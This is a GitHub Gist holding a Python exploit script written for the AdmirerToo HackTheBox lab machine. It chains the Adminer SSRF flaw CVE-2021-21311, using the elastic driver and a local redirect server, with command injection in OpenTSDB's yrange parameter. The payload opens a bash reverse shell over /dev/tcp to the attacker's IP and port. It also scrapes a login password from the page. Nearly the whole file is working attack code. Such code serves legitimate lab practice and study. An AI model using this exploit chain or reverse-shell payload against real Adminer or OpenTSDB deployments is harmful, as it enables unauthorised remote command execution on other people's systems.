Created
May 17, 2022 11:48
-
-
Save bitstuffing/ced0a705e5e893aa5ed78a84e72a57f9 to your computer and use it in GitHub Desktop.
AdmirerToo HTB SSRF Python Script to check and get remote execution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
''' | |
This script was done to test and check all the things for AdmirerToo hard HachTheBox machine. | |
It will create an HTTP redirect server for Adminer remote machine to exploit login method, | |
using elastic driver to exploit SSRF, more information at: | |
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery | |
Information about CVE-2021-21311 explotation at: | |
https://github.com/advisories/GHSA-x5r2-hj5c-8jx6 | |
Data will be extracted from DIV <div class='error'> and displayed in info.log | |
Good responses will be stored in response.txt (all information) | |
Made by @bit with love for learning purpouses only. | |
''' | |
import requests | |
import html | |
#import threading | |
#choose multiprocessing because you could .terminate() subproccess and a thread with an infinite loop httpserver not | |
import multiprocessing | |
import sys | |
import time | |
from http.server import HTTPServer, BaseHTTPRequestHandler | |
import logging | |
logging.basicConfig(filename='info.log', encoding='utf-8', level=logging.DEBUG) | |
DOMAIN = 'db.admirer-gallery.htb' | |
#your IP and PORT for checks and a remote shell | |
REMOTE_IP = "10.10.14.101" | |
REMOTE_PORT = "39001" | |
#you will need to do a great nmap work with good 'filtered' results to check this port, if you check all ports you will be banned | |
port = 4242 | |
#first, need to check this endpoint to extract OpenTSDB version | |
#uri = "api/version" | |
#second, if you want to check you're able to receive a ping from remote server and execution injection | |
#uri = "q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=%5B33:system(%27ping+-c+1+"+REMOTE_IP+"%27)%5D&wxh=1516x644&style=linespoint&baba=lala&grid=t&json" | |
#third, payload to remote console | |
uri = 'q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=%5B33:system(%27%2Fbin%2Fbash+-c+%22%2Fbin%2Fbash+-i+%3E%26+%2Fdev%2Ftcp%2F'+REMOTE_IP+'%2F'+REMOTE_PORT+'+0%3E%261%22%27)%5D&wxh=1516x644&style=linespoint&baba=lala&grid=t&json' | |
print("testing port %s" % port) | |
print("testing uri %s" % uri) | |
''' | |
This class will open a local HTTP to redirect | |
''' | |
class Redirect(BaseHTTPRequestHandler): | |
def do_GET(self): | |
self.send_response(302) | |
self.send_header('Location', "http://127.0.0.1:%s/%s" % (port,uri)) | |
self.end_headers() | |
''' | |
Function to wrap local redirect server in a thread | |
''' | |
def thread_function(port): | |
HTTPServer(("", port), Redirect).serve_forever() | |
#x = threading.Thread(target=thread_function, args=(80,)) | |
x = multiprocessing.Process(target=thread_function, args=(80,)) | |
x.start() | |
time.sleep(1) #if you close it in a looper to scan remote ports you will get a too many logins from WAF, and it's needed more than 1 second | |
headersDic = { | |
"User-Agent" : "Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0", | |
"Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", | |
"Accept-Language" : "en-US,en;q=0.5", | |
# "Accept-Encoding" : "gzip, deflate", | |
"Origin" : "http://%s" % DOMAIN | |
} | |
s = requests.Session() | |
r = s.get('http://%s' % DOMAIN, headers=headersDic) | |
#could extract data from first response but... I hardcoded that | |
#from login page, you could extract it from response but it's constant | |
#ADMIRER_PASSWORD = "1w4nn4b3adm1r3d2" | |
ADMIRER_PASSWORD = r.text | |
ADMIRER_PASSWORD = ADMIRER_PASSWORD[ADMIRER_PASSWORD.find('auth[password]" value="')+len('auth[password]" value="'):] | |
ADMIRER_PASSWORD = ADMIRER_PASSWORD[:ADMIRER_PASSWORD.find('"')] | |
postData = { | |
"auth[driver]" : "elastic", #this driver do the magic | |
"auth[server]" : REMOTE_IP, | |
"auth[username]" : "admirer_ro", | |
"auth[password]" : ADMIRER_PASSWORD, | |
"auth[permanent]" : "1" | |
} | |
r2 = s.post('http://%s/' % DOMAIN,data=postData, headers=headersDic) | |
response = r2.text | |
response_original = response #store it for log purpousess | |
response = response[response.find("<div class='error'>")+len("<div class='error'>"):response.find("<form action='' method='post'>")].strip() | |
response = response[:len(response)-len('</div>')] | |
response = html.unescape(response) | |
if len(response) == 86: #play with right response size, so... it's discarted | |
logging.debug('DISCARTED! port % - response: %s' % (port,response)) | |
else: | |
logging.info('GOOD port %s detected' % port) | |
with open('response.txt', 'w') as f: | |
f.write(response_original) | |
x.terminate() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment